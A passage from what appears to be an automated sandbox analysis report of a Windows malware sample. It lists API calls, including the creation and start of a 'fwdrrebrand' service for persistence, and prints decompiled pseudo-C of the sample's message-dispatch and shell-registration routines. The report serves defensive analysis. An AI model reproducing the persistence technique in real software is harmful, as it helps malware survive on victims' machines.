                  • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 023ED4DC
                  • CreateServiceW.ADVAPI32(00000000,fwdrrebrand,fwdrrebrand,00000012,00000010,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 023ED53B
                  • OpenServiceW.ADVAPI32(00000000,fwdrrebrand,00000010), ref: 023ED54F
                  • ChangeServiceConfig2W.ADVAPI32(00000000,00000001,?), ref: 023ED56D
                  • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 023ED582
                  • CloseServiceHandle.ADVAPI32(00000000), ref: 023ED58B
                  • CloseServiceHandle.ADVAPI32(00000000), ref: 023ED599
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: Service$CloseHandleOpen$ChangeConfig2CreateManagerStart
                  • String ID: C:\Windows\SysWOW64\fwdrrebrand.exe$fwdrrebrand
                  • API String ID: 643643595-3855578920
                  • Opcode ID: 6f2acf248d1c994a0144a333f49c7072a66baa076bfae328e4ac452df8ec84d0
                  • Instruction ID: ca0e940bb6fd3abaad8d40c9ea3dd7187d6fd3ca6311d367dd8f154af76291e1
                  • Opcode Fuzzy Hash: 6f2acf248d1c994a0144a333f49c7072a66baa076bfae328e4ac452df8ec84d0
                  • Instruction Fuzzy Hash: 3C2108B5A41328B7DF306778AC48FAF366DAB84710F000514FA07E72C6DBB09D1886A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,00000000,023ED563,?,00000000,00000000,00000000,00000000), ref: 023ED24F
                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,023ED563), ref: 023ED25D
                    • Part of subcall function 023E14F2: GetProcessHeap.KERNEL32(00000008,023EF000,023E1A84,?,?,?,?,?,?,?,023E10F5), ref: 023E14F5
                    • Part of subcall function 023E14F2: RtlAllocateHeap.NTDLL(00000000), ref: 023E14FC
                  • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,023ED563,023ED563,?,00000000,00000000,00000000), ref: 023ED29A
                  • GetTickCount.KERNEL32 ref: 023ED2A8
                  • OpenServiceW.ADVAPI32(?,00000000,00000001,?,?,?,?,?,?,?,023ED563), ref: 023ED2D2
                  • QueryServiceConfig2W.ADVAPI32(00000000,00000001,00000000,00000000,?,?,?,?,?,?,?,?,023ED563), ref: 023ED2EA
                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,023ED563), ref: 023ED2F4
                  • QueryServiceConfig2W.ADVAPI32(?,00000001,00000000,?,?,?,?,?,?,?,?,?,023ED563), ref: 023ED31A
                    • Part of subcall function 023E1532: GetProcessHeap.KERNEL32(00000000,00000000,023E13F0), ref: 023E1535
                    • Part of subcall function 023E1532: HeapFree.KERNEL32(00000000), ref: 023E153C
                  • CloseServiceHandle.ADVAPI32(?,?,?,?,?,?,?,?,023ED563), ref: 023ED330
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: HeapService$Config2EnumErrorLastProcessQueryServicesStatus$AllocateCloseCountFreeHandleOpenTick
                  • String ID:
                  • API String ID: 2166652104-0
                  • Opcode ID: 26eddb9ac37fe090369e0dec95b59696b4848ec12802b3b8fe419008701ecd7c
                  • Instruction ID: 0653cdb0a0807ab6633c50f27f1a4b31b97b053d10bfe879c4e3c21bf6b1ef0f
                  • Opcode Fuzzy Hash: 26eddb9ac37fe090369e0dec95b59696b4848ec12802b3b8fe419008701ecd7c
                  • Instruction Fuzzy Hash: D54153B5E10219AFDF159BA9DC45FAEB7BDEB44700F100129E616E6280D770EE448B60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 37%
                  			E004110C4(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                  				signed int _t156;
                  				signed int _t158;
                  				signed int* _t161;
                  				intOrPtr _t168;
                  				intOrPtr* _t169;
                  				signed int _t172;
                  				signed int _t175;
                  				signed int* _t179;
                  				signed int* _t182;
                  				signed int _t186;
                  				signed int _t190;
                  				signed int _t194;
                  				signed int _t198;
                  				signed int _t201;
                  				signed int* _t203;
                  				signed int _t204;
                  				signed int _t205;
                  				intOrPtr* _t206;
                  				signed int _t207;
                  				signed int _t222;
                  				signed int _t226;
                  				unsigned int _t233;
                  				void* _t234;
                  
                  				_t209 = __ecx;
                  				_push(0x70);
                  				E00431A9B(E0044B122, __ebx, __edi, __esi);
                  				_t231 = __ecx;
                  				 *((intOrPtr*)(_t234 - 0x10)) = 0;
                  				 *((intOrPtr*)(_t234 - 0x14)) = 0x7fffffff;
                  				_t198 =  *(_t234 + 8);
                  				 *(_t234 - 4) = 0;
                  				if(_t198 != 0x111) {
                  					__eflags = _t198 - 0x4e;
                  					if(_t198 != 0x4e) {
                  						_t233 =  *(_t234 + 0x10);
                  						__eflags = _t198 - 6;
                  						if(_t198 == 6) {
                  							E00410A7D(_t209, _t231,  *((intOrPtr*)(_t234 + 0xc)), E0040EE3C(_t198, __ecx, _t233));
                  						}
                  						__eflags = _t198 - 0x20;
                  						if(_t198 != 0x20) {
                  							L12:
                  							_t156 =  *(_t231 + 0x4c);
                  							__eflags = _t156;
                  							if(_t156 == 0) {
                  								L20:
                  								_t158 =  *((intOrPtr*)( *_t231 + 0x28))();
                  								 *(_t234 + 0x10) = _t158;
                  								_t201 = (_t158 ^  *(_t234 + 8)) & 0x000001ff;
                  								E0040D713(_t201, _t234 - 0x14, _t231, _t233, 7);
                  								_t203 = 0x464b18 + _t201 * 0xc;
                  								 *(_t234 - 0x18) = _t203;
                  								__eflags =  *(_t234 + 8) -  *_t203;
                  								if( *(_t234 + 8) !=  *_t203) {
                  									L25:
                  									_t161 =  *(_t234 - 0x18);
                  									_t204 =  *(_t234 + 0x10);
                  									 *_t161 =  *(_t234 + 8);
                  									_t161[2] = _t204;
                  									while(1) {
                  										__eflags =  *_t204;
                  										if( *_t204 == 0) {
                  											break;
                  										}
                  										__eflags =  *(_t234 + 8) - 0xc000;
                  										_push(0);
                  										_push(0);
                  										if( *(_t234 + 8) >= 0xc000) {
                  											_push(0xc000);
                  											_push( *((intOrPtr*)( *(_t234 + 0x10) + 4)));
                  											while(1) {
                  												_t205 = E0040CDA9();
                  												__eflags = _t205;
                  												if(_t205 == 0) {
                  													break;
                  												}
                  												__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t205 + 0x10)))) -  *(_t234 + 8);
                  												if( *((intOrPtr*)( *((intOrPtr*)(_t205 + 0x10)))) ==  *(_t234 + 8)) {
                  													( *(_t234 - 0x18))[1] = _t205;
                  													E0040D747(_t234 - 0x14);
                  													L113:
                  													_t206 =  *((intOrPtr*)(_t205 + 0x14));
                  													L114:
                  													_push(_t233);
                  													L115:
                  													_push( *((intOrPtr*)(_t234 + 0xc)));
                  													L116:
                  													_t168 =  *_t206(); // executed
                  													L117:
                  													 *((intOrPtr*)(_t234 - 0x10)) = _t168;
                  													goto L118;
                  												}
                  												_push(0);
                  												_push(0);
                  												_push(0xc000);
                  												_t207 = _t205 + 0x18;
                  												__eflags = _t207;
                  												_push(_t207);
                  											}
                  											_t204 =  *(_t234 + 0x10);
                  											L36:
                  											_t204 =  *_t204();
                  											 *(_t234 + 0x10) = _t204;
                  											continue;
                  										}
                  										_push( *(_t234 + 8));
                  										_push( *((intOrPtr*)(_t204 + 4)));
                  										_t175 = E0040CDA9();
                  										 *(_t234 + 0x10) = _t175;
                  										__eflags = _t175;
                  										if(_t175 == 0) {
                  											goto L36;
                  										}
                  										( *(_t234 - 0x18))[1] = _t175;
                  										E0040D747(_t234 - 0x14);
                  										L29:
                  										_t222 =  *((intOrPtr*)( *(_t234 + 0x10) + 0x10)) - 1;
                  										__eflags = _t222 - 0x53;
                  										if(__eflags > 0) {
                  											goto L118;
                  										}
                  										switch( *((intOrPtr*)(_t222 * 4 +  &M00411688))) {
                  											case 0:
                  												_push(E00422D89(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc)));
                  												goto L44;
                  											case 1:
                  												_push( *(__ebp + 0xc));
                  												goto L44;
                  											case 2:
                  												__eax = __esi;
                  												__eax = __esi >> 0x10;
                  												__eflags = __eax;
                  												_push(__eax);
                  												__eax = __si & 0x0000ffff;
                  												_push(__si & 0x0000ffff);
                  												__eax = E0040EE3C(__ebx, __ecx,  *(__ebp + 0xc));
                  												goto L50;
                  											case 3:
                  												_push(__esi);
                  												__eax = E0040EE3C(__ebx, __ecx,  *(__ebp + 0xc));
                  												goto L42;
                  											case 4:
                  												_push(__esi);
                  												L44:
                  												__ecx = __edi; // executed
                  												__eax =  *__ebx(); // executed
                  												goto L117;
                  											case 5:
                  												__ecx = __ebp - 0x28;
                  												E00422859(__ebp - 0x28) =  *(__esi + 4);
                  												__ecx = __ebp - 0x7c;
                  												 *((char*)(__ebp - 4)) = 1;
                  												 *(__ebp - 0x24) =  *(__esi + 4);
                  												__eax = E0040D77C(__ecx, __eflags);
                  												__eax =  *__esi;
                  												__esi =  *(__esi + 8);
                  												 *((char*)(__ebp - 4)) = 2;
                  												 *(__ebp - 0x5c) = __eax;
                  												__eax = E0040EE68(__ecx, __edi, __esi, __eflags, __eax);
                  												__eflags = __eax;
                  												if(__eax == 0) {
                  													__eax =  *(__edi + 0x4c);
                  													__eflags = __eax;
                  													if(__eax != 0) {
                  														__ecx = __eax + 0x24;
                  														__eax = E00424500(__eax + 0x24, __edi, __esi,  *(__ebp - 0x5c));
                  														__eflags = __eax;
                  														if(__eax != 0) {
                  															 *(__ebp - 0x2c) = __eax;
                  														}
                  													}
                  													__eax = __ebp - 0x7c;
                  												}
                  												_push(__esi);
                  												_push(__eax);
                  												__eax = __ebp - 0x28;
                  												_push(__ebp - 0x28);
                  												__ecx = __edi;
                  												__eax =  *__ebx();
                  												 *(__ebp - 0x24) =  *(__ebp - 0x24) & 0x00000000;
                  												_t84 = __ebp - 0x5c;
                  												 *_t84 =  *(__ebp - 0x5c) & 0x00000000;
                  												__eflags =  *_t84;
                  												__ecx = __ebp - 0x7c;
                  												 *(__ebp - 0x10) = __ebp - 0x28;
                  												 *((char*)(__ebp - 4)) = 1;
                  												__eax = E0040F76D(__ebx, __ebp - 0x7c, __edi, __esi,  *_t84);
                  												goto L59;
                  											case 6:
                  												__ecx = __ebp - 0x28;
                  												E00422859(__ebp - 0x28) =  *(__esi + 4);
                  												_push( *(__esi + 8));
                  												 *(__ebp - 0x24) =  *(__esi + 4);
                  												__eax = __ebp - 0x28;
                  												_push(__ebp - 0x28);
                  												__ecx = __edi;
                  												 *((char*)(__ebp - 4)) = 3;
                  												__eax =  *__ebx();
                  												 *(__ebp - 0x24) =  *(__ebp - 0x24) & 0x00000000;
                  												 *(__ebp - 0x10) = __ebp - 0x28;
                  												L59:
                  												__ecx = __ebp - 0x28;
                  												 *((char*)(__ebp - 4)) = 0;
                  												__eax = E00422E06(__ecx);
                  												goto L118;
                  											case 7:
                  												__eax =  *(__ebp + 0xc);
                  												__eax =  *(__ebp + 0xc) >> 0x10;
                  												__eflags = __eax;
                  												_push(__eax);
                  												__eax = E0040EE3C(__ebx, __ecx, __esi);
                  												goto L62;
                  											case 8:
                  												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                  												_push( *(__ebp + 0xc) >> 0x10);
                  												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                  												goto L42;
                  											case 9:
                  												goto L114;
                  											case 0xa:
                  												_push(E0041F4E8(__ebx, __ecx, __edi, __esi, __eflags, __esi));
                  												__eax =  *(__ebp + 0xc);
                  												__eax =  *(__ebp + 0xc) >> 0x10;
                  												L62:
                  												_push(__eax);
                  												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                  												L50:
                  												_push(__eax);
                  												__ecx = __edi;
                  												__eax =  *__ebx();
                  												goto L117;
                  											case 0xb:
                  												_push(__esi);
                  												goto L110;
                  											case 0xc:
                  												_push( *(__ebp + 0xc));
                  												goto L66;
                  											case 0xd:
                  												__ecx = __edi;
                  												__eax =  *__ebx();
                  												goto L118;
                  											case 0xe:
                  												__eax =  *(__ebp + 0xc);
                  												__eax =  *(__ebp + 0xc) >> 0x10;
                  												__eflags = __eax;
                  												_push(__eax);
                  												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                  												goto L69;
                  											case 0xf:
                  												_push(__esi >> 0x10);
                  												__eax = __si;
                  												goto L69;
                  											case 0x10:
                  												__eax = __esi;
                  												__eax = __esi >> 0x10;
                  												__eflags = __eax;
                  												_push(__eax);
                  												__eax = __si & 0x0000ffff;
                  												goto L72;
                  											case 0x11:
                  												__eax = E0040EE3C(__ebx, __ecx, __esi);
                  												goto L48;
                  											case 0x12:
                  												__ecx = __edi;
                  												__eax =  *__ebx();
                  												goto L117;
                  											case 0x13:
                  												_push(E0040EE3C(__ebx, __ecx,  *(__ebp + 0xc)));
                  												_push(E0040EE3C(__ebx, __ecx, __esi));
                  												__eax = 0;
                  												__eflags =  *((intOrPtr*)(__edi + 0x20)) - __esi;
                  												_t112 =  *((intOrPtr*)(__edi + 0x20)) == __esi;
                  												__eflags = _t112;
                  												__eax = 0 | _t112;
                  												goto L75;
                  											case 0x14:
                  												__eax = E00422D89(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc));
                  												goto L77;
                  											case 0x15:
                  												__eax = E0041F4E8(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc));
                  												goto L77;
                  											case 0x16:
                  												__esi = __esi >> 0x10;
                  												_push(__esi >> 0x10);
                  												__eax = __si;
                  												_push(__si);
                  												__eax = E0041F4E8(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc));
                  												goto L75;
                  											case 0x17:
                  												_push( *(__ebp + 0xc));
                  												goto L81;
                  											case 0x18:
                  												_push(__esi);
                  												L81:
                  												__eax = E0040EE3C(__ebx, __ecx);
                  												L77:
                  												_push(__eax);
                  												goto L66;
                  											case 0x19:
                  												__eax = __esi;
                  												__eax = __esi >> 0x10;
                  												__eflags = __eax;
                  												_push(__eax);
                  												__eax = __si & 0x0000ffff;
                  												goto L84;
                  											case 0x1a:
                  												__eax = __si;
                  												__esi = __esi >> 0x10;
                  												__ecx = __si;
                  												_push(__ecx);
                  												L84:
                  												_push(__eax);
                  												__eax = E0040EE3C(__ebx, __ecx,  *(__ebp + 0xc));
                  												goto L75;
                  											case 0x1b:
                  												_push(__esi);
                  												__eax = E0040EE3C(__ebx, __ecx,  *(__ebp + 0xc));
                  												goto L69;
                  											case 0x1c:
                  												__eax =  *(__ebp + 0xc);
                  												__eax =  *(__ebp + 0xc) >> 0x10;
                  												__eflags = __eax;
                  												_push(__eax);
                  												__eax = E0040EE3C(__ebx, __ecx, __esi);
                  												goto L88;
                  											case 0x1d:
                  												__ecx =  *(__ebp + 0xc);
                  												__edx = __cx;
                  												__ecx =  *(__ebp + 0xc) >> 0x10;
                  												__ecx = __cx;
                  												 *((intOrPtr*)(__ebp + 8)) = __edx;
                  												 *(__ebp + 0xc) = __ecx;
                  												__eflags = __eax - 0x2a;
                  												if(__eax != 0x2a) {
                  													_push(__ecx);
                  													_push(__edx);
                  													goto L111;
                  												}
                  												_push(E0040EE3C(__ebx, __ecx, __esi));
                  												_push( *(__ebp + 0xc));
                  												_push( *((intOrPtr*)(__ebp + 8)));
                  												goto L73;
                  											case 0x1e:
                  												_push(__esi);
                  												L66:
                  												__ecx = __edi; // executed
                  												__eax =  *__ebx(); // executed
                  												goto L118;
                  											case 0x1f:
                  												_push(__esi);
                  												_push( *(__ebp + 0xc));
                  												__ecx = __edi;
                  												__eax =  *__ebx();
                  												goto L2;
                  											case 0x20:
                  												__eax = __si;
                  												__eflags = __esi;
                  												__ecx = __si;
                  												_push(__ecx);
                  												L42:
                  												_push(__eax);
                  												goto L116;
                  											case 0x21:
                  												__eax =  *(__ebp + 0xc);
                  												_push(__esi);
                  												__eax =  *(__ebp + 0xc) >> 0x10;
                  												L88:
                  												_push(__eax);
                  												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                  												L75:
                  												_push(__eax);
                  												goto L73;
                  											case 0x22:
                  												__eax = __si;
                  												__esi = __esi >> 0x10;
                  												__ecx = __si;
                  												_push(__si);
                  												L72:
                  												_push(__eax);
                  												_push( *(__ebp + 0xc));
                  												L73:
                  												__ecx = __edi; // executed
                  												__eax =  *__ebx(); // executed
                  												goto L118;
                  											case 0x23:
                  												__eax = __si;
                  												__esi = __esi >> 0x10;
                  												__ecx = __si;
                  												_push(__si);
                  												_push(__si);
                  												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                  												_push( *(__ebp + 0xc) >> 0x10);
                  												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                  												_push( *(__ebp + 0xc) & 0x0000ffff);
                  												__ecx = __edi;
                  												__eax =  *__ebx();
                  												 *(__ebp - 0x10) =  *(__ebp + 0xc) & 0x0000ffff;
                  												L6:
                  												__eflags = _t194;
                  												if(_t194 != 0) {
                  													goto L118;
                  												}
                  												goto L39;
                  											case 0x24:
                  												__eax = __si;
                  												__esi = __esi >> 0x10;
                  												__ecx = __si;
                  												_push(__si);
                  												_push(__si);
                  												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                  												_push( *(__ebp + 0xc) >> 0x10);
                  												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                  												_push( *(__ebp + 0xc) & 0x0000ffff);
                  												__ecx = __edi;
                  												__eax =  *__ebx();
                  												goto L118;
                  											case 0x25:
                  												goto L118;
                  											case 0x26:
                  												__ecx = __edi;
                  												__eax =  *__ebx();
                  												 *(__ebp - 0x10) = __eax;
                  												__eflags = __eax;
                  												if(__eax == 0) {
                  													goto L118;
                  												}
                  												L39:
                  												 *(_t234 - 4) =  *(_t234 - 4) | 0xffffffff;
                  												E0040D747(_t234 - 0x14);
                  												_t172 = 0;
                  												__eflags = 0;
                  												goto L40;
                  											case 0x27:
                  												__eax = E0041F4E8(__ebx, __ecx, __edi, __esi, __eflags, __esi);
                  												L48:
                  												_push(__eax);
                  												L110:
                  												_push( *(__ebp + 0xc));
                  												goto L111;
                  											case 0x28:
                  												_push(E0041F4E8(__ebx, __ecx, __edi, __esi, __eflags, __esi));
                  												goto L115;
                  											case 0x29:
                  												_push(__esi);
                  												__eax = E0041F4E8(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc));
                  												goto L69;
                  											case 0x2a:
                  												__ecx = __si & 0x0000ffff;
                  												_push(__si & 0x0000ffff);
                  												__eax = __esi;
                  												__eax = __esi >> 0x10;
                  												__ecx = __eax;
                  												__ecx = __eax & 0x0000f000;
                  												_push(__ecx);
                  												__eax = __eax & 0x00000fff;
                  												__eflags = __eax;
                  												_push(__eax);
                  												__eax = E0040EE3C(__ebx, __ecx,  *(__ebp + 0xc));
                  												goto L104;
                  											case 0x2b:
                  												__eax =  *(__ebp + 0xc) & 0x000000ff;
                  												_push(__esi);
                  												L69:
                  												_push(__eax);
                  												L111:
                  												__ecx = __edi;
                  												__eax =  *__ebx();
                  												goto L118;
                  											case 0x2c:
                  												__eax = __si;
                  												__esi = __esi >> 0x10;
                  												__ecx = __si;
                  												_push(__si);
                  												_push(__si);
                  												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                  												_push( *(__ebp + 0xc) >> 0x10);
                  												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                  												L104:
                  												_push(__eax);
                  												goto L105;
                  											case 0x2d:
                  												__eax = __si;
                  												__esi = __esi >> 0x10;
                  												__ecx = __si;
                  												_push(__si);
                  												_push(__si);
                  												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                  												_push( *(__ebp + 0xc) >> 0x10);
                  												_push( *(__ebp + 0xc));
                  												L105:
                  												__ecx = __edi;
                  												__eax =  *__ebx();
                  												goto L2;
                  										}
                  									}
                  									_t179 =  *(_t234 - 0x18);
                  									_t58 =  &(_t179[1]);
                  									 *_t58 = _t179[1] & 0x00000000;
                  									__eflags =  *_t58;
                  									E0040D747(_t234 - 0x14);
                  									goto L39;
                  								}
                  								_t182 = _t203;
                  								__eflags =  *(_t234 + 0x10) - _t182[2];
                  								if( *(_t234 + 0x10) != _t182[2]) {
                  									goto L25;
                  								}
                  								_t205 = _t182[1];
                  								 *(_t234 + 0x10) = _t205;
                  								E0040D747(_t234 - 0x14);
                  								__eflags = _t205;
                  								if(_t205 == 0) {
                  									goto L39;
                  								}
                  								__eflags =  *(_t234 + 8) - 0xc000;
                  								if( *(_t234 + 8) < 0xc000) {
                  									goto L29;
                  								}
                  								goto L113;
                  							}
                  							__eflags =  *(_t156 + 0x74);
                  							if( *(_t156 + 0x74) <= 0) {
                  								goto L20;
                  							}
                  							__eflags = _t198 - 0x200;
                  							if(_t198 < 0x200) {
                  								L16:
                  								__eflags = _t198 - 0x100;
                  								if(_t198 < 0x100) {
                  									L18:
                  									__eflags = _t198 - 0x281 - 0x10;
                  									if(_t198 - 0x281 > 0x10) {
                  										goto L20;
                  									}
                  									L19:
                  									_t186 =  *((intOrPtr*)( *( *(_t231 + 0x4c)) + 0x94))(_t198,  *((intOrPtr*)(_t234 + 0xc)), _t233, _t234 - 0x10);
                  									__eflags = _t186;
                  									if(_t186 != 0) {
                  										goto L118;
                  									}
                  									goto L20;
                  								}
                  								__eflags = _t198 - 0x10f;
                  								if(_t198 <= 0x10f) {
                  									goto L19;
                  								}
                  								goto L18;
                  							}
                  							__eflags = _t198 - 0x209;
                  							if(_t198 <= 0x209) {
                  								goto L19;
                  							}
                  							goto L16;
                  						} else {
                  							_t190 = E00410AF5(_t198, _t231, _t231, _t233, _t233 >> 0x10);
                  							__eflags = _t190;
                  							if(_t190 != 0) {
                  								L2:
                  								 *((intOrPtr*)(_t234 - 0x10)) = 1;
                  								L118:
                  								_t169 =  *((intOrPtr*)(_t234 + 0x14));
                  								if(_t169 != 0) {
                  									 *_t169 =  *((intOrPtr*)(_t234 - 0x10));
                  								}
                  								 *(_t234 - 4) =  *(_t234 - 4) | 0xffffffff;
                  								E0040D747(_t234 - 0x14);
                  								_t172 = 1;
                  								L40:
                  								return E00431B73(_t172);
                  							}
                  							goto L12;
                  						}
                  					}
                  					_t226 =  *(_t234 + 0x10);
                  					__eflags =  *_t226;
                  					if( *_t226 == 0) {
                  						goto L39;
                  					}
                  					_push(_t234 - 0x10);
                  					_push(_t226);
                  					_push( *((intOrPtr*)(_t234 + 0xc)));
                  					_t194 =  *((intOrPtr*)( *__ecx + 0xf4))();
                  					goto L6;
                  				}
                  				_push( *(_t234 + 0x10));
                  				_push( *((intOrPtr*)(_t234 + 0xc)));
                  				if( *((intOrPtr*)( *__ecx + 0xf0))() == 0) {
                  					goto L39;
                  				}
                  				goto L2;
                  			}

                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3
                  • String ID:
                  • API String ID: 431132790-0
                  • Opcode ID: 5581757f2f0f604347708a168a423f3eb4049c49235fdbbd8d9b4c50d54d3b50
                  • Instruction ID: 5d7ebeb502aa4d7c5eabf293e969739ff04ac9ecbf51b97e95c40226f3c0dc1a
                  • Opcode Fuzzy Hash: 5581757f2f0f604347708a168a423f3eb4049c49235fdbbd8d9b4c50d54d3b50
                  • Instruction Fuzzy Hash: 58F19270600219EFDB14DF55C880EFF7BA9EF08314F10851AFA19AB2A1D739D981DB69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  [Control-flow graph of function E00427ACD; image not preserved. Legend: Executed / Not Executed]
                  C-Code - Quality: 90%
                  			E00427ACD(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t148;
                  				void* _t166;
                  				void* _t177;
                  				intOrPtr _t179;
                  				intOrPtr _t182;
                  				intOrPtr _t192;
                  				intOrPtr _t195;
                  				void* _t197;
                  				intOrPtr _t198;
                  				intOrPtr _t200;
                  				intOrPtr _t204;
                  				intOrPtr _t205;
                  				intOrPtr _t208;
                  				intOrPtr _t211;
                  				intOrPtr _t219;
                  				intOrPtr _t222;
                  				intOrPtr _t225;
                  				intOrPtr _t230;
                  				struct HICON__* _t239;
                  				void* _t240;
                  				intOrPtr _t247;
                  				intOrPtr _t248;
                  				void* _t276;
                  				void* _t277;
                  				void* _t294;
                  				intOrPtr* _t327;
                  				intOrPtr _t328;
                  				char* _t329;
                  				void* _t330;
                  				void* _t332;
                  				intOrPtr _t333;
                  				intOrPtr _t334;
                  				char* _t335;
                  				struct HICON__* _t336;
                  				void* _t338;
                  				void* _t339;
                  				void* _t340;
                  				intOrPtr _t342;
                  
                  				_t340 = __eflags;
                  				_t325 = __edx;
                  				_push(0x3c);
                  				E00431A9B(E0044C457, __ebx, __edi, __esi);
                  				_t332 = __ecx;
                  				E004014C0(_t338 - 0x2c, __edx);
                  				 *(_t338 - 4) =  *(_t338 - 4) & 0x00000000;
                  				E004014C0(_t338 - 0x14, __edx);
                  				 *(_t338 - 4) = 1;
                  				E004292E7(__ebx, __edx,  *((intOrPtr*)(E0041F363(__ebx, __edi, _t332, _t340) + 8)), _t338 - 0x2c); // executed
                  				_t148 =  *((intOrPtr*)(_t332 + 8));
                  				 *((intOrPtr*)(_t338 - 0x3c)) = _t148;
                  				 *(_t338 - 0x30) = 1;
                  				if(_t148 == 0) {
                  					L45:
                  					E004010B0( *((intOrPtr*)(_t338 - 0x14)) + 0xfffffff0, _t325);
                  					return E00431B73(E004010B0( &(( *(_t338 - 0x2c))[0xfffffffffffffff0]), _t325));
                  				} else {
                  					_t333 = _t332 + 4;
                  					_t342 = _t333;
                  					 *((intOrPtr*)(_t338 - 0x40)) = _t333;
                  					do {
                  						_t327 =  *((intOrPtr*)(E00408692(_t338 - 0x3c)));
                  						 *((intOrPtr*)(_t338 - 0x44)) = _t327;
                  						E00405562(_t338 - 0x24, _t342, _t338 - 0x2c);
                  						 *(_t338 - 4) = 2;
                  						E00405562(_t338 - 0x28, _t342, _t338 - 0x2c);
                  						 *(_t338 - 4) = 3;
                  						E00405562(_t338 - 0x20, _t342, _t338 - 0x2c);
                  						 *(_t338 - 4) = 4;
                  						E00405562(_t338 - 0x38, _t342, _t338 - 0x2c);
                  						_t247 =  *((intOrPtr*)(_t338 + 8));
                  						_t343 = _t247;
                  						if(_t247 != 0) {
                  							E004014C0(_t338 - 0x34, _t325);
                  							_t335 =  *(_t338 - 0x2c);
                  							 *(_t338 - 4) = 6;
                  							_t239 = ExtractIconA( *(E0041F363(_t247, _t327, _t335, _t343) + 8), _t335,  *(_t338 - 0x30)); // executed
                  							_t336 = _t239;
                  							_t240 = _t338 - 0x34;
                  							if(_t336 == 0) {
                  								E004015A0(_t240, ",%d", 0);
                  								_t339 = _t339 + 0xc;
                  							} else {
                  								E004015A0(_t240, ",%d",  *(_t338 - 0x30));
                  								_t339 = _t339 + 0xc;
                  								DestroyCursor(_t336);
                  							}
                  							E00405E21(_t338 - 0x38, _t325,  *((intOrPtr*)(_t338 - 0x34)),  *((intOrPtr*)( *((intOrPtr*)(_t338 - 0x34)) - 0xc)));
                  							E004010B0( *((intOrPtr*)(_t338 - 0x34)) - 0x10, _t325);
                  						}
                  						E004014C0(_t338 - 0x18, _t325);
                  						E004014C0(_t338 - 0x10, _t325);
                  						E004014C0(_t338 - 0x1c, _t325);
                  						 *(_t338 - 4) = 9;
                  						_t166 =  *((intOrPtr*)( *_t327 + 0x64))(_t338 - 0x10, 5);
                  						_t334 =  *((intOrPtr*)(_t338 - 0x38));
                  						if(_t166 == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t338 - 0x10)) - 0xc)) == 0) {
                  							_t328 =  *((intOrPtr*)(_t338 - 0x24));
                  							_t248 =  *((intOrPtr*)(_t338 - 0x28));
                  							goto L42;
                  						} else {
                  							_push(6);
                  							_push(_t338 - 0x1c);
                  							if( *((intOrPtr*)( *_t327 + 0x64))() == 0) {
                  								E004056C2(_t247, _t338 - 0x1c, _t338 - 0x10);
                  							}
                  							_t177 = E00427206(_t334,  *((intOrPtr*)(_t338 - 0x10)),  *((intOrPtr*)(_t338 - 0x1c)), 0); // executed
                  							if(_t177 != 0) {
                  								__eflags = _t247;
                  								if(_t247 == 0) {
                  									L17:
                  									_t179 =  *((intOrPtr*)( *_t327 + 0x64))(_t338 - 0x14, 0);
                  									__eflags = _t179;
                  									if(_t179 == 0) {
                  										L22:
                  										_t329 = "ddeexec";
                  										_push(_t329);
                  										E004015A0(_t338 - 0x14, "%s\\shell\\open\\%s",  *((intOrPtr*)(_t338 - 0x10)));
                  										_t339 = _t339 + 0x10;
                  										_t182 = E00427206(_t334,  *((intOrPtr*)(_t338 - 0x14)), "[open(\"%1\")]", 0); // executed
